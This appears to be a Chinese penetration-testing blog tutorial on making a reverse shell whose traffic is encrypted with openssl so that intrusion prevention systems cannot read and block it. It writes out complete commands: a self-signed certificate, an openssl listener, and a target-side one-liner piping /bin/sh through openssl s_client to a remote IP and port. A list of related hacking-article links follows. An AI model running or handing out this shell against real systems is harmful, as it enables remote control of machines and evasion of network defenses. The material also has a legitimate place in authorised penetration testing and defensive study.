文章目录
- openssl反弹流量加密shell
openssl反弹流量加密shell 先正常反弹shell使用wireshark抓取流量
nc监听端口
文章图片
反弹shell
文章图片
查看wireshark抓取的流量,发现通过明文传输
【内网渗透|【内网渗透】openssl反弹流量加密shell】
文章图片
这样会被内网一些ips等安全防护设备发现流量进行阻断
使用openssl反弹加密shell
使用kaliopenssl生成自签名证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
文章图片
监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
文章图片
目标机执行
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.80.130:8080>/tmp/s; rm /tmp/s
文章图片
可以正常执行命令
文章图片
使用wireshark抓取流量,流量已经加密
文章图片
推荐阅读
- 渗透测试|windows反弹shell复现
- 内网渗透|内网渗透(nc反弹shell总结)
- 内网渗透|【内网渗透】内网不出网机器反弹shell以及CS上线
- 渗透测试|通用渗透测试框架、简化渗透测试流程
- 如此高调的网络部队被“轻易秒杀”,奥地利这波网络战运作堪称完美
- linux|如何进行mysql下的严格模式修改,使得使用插入用户表方式添加新用户成功
- 网络安全|mysql中的视图、触发器和存储过程
- 网络攻防实验|实验十四(Wireshark数据抓包分析之ARP协议)
- 密码学|机器学习隐私保护-MPC通用编译器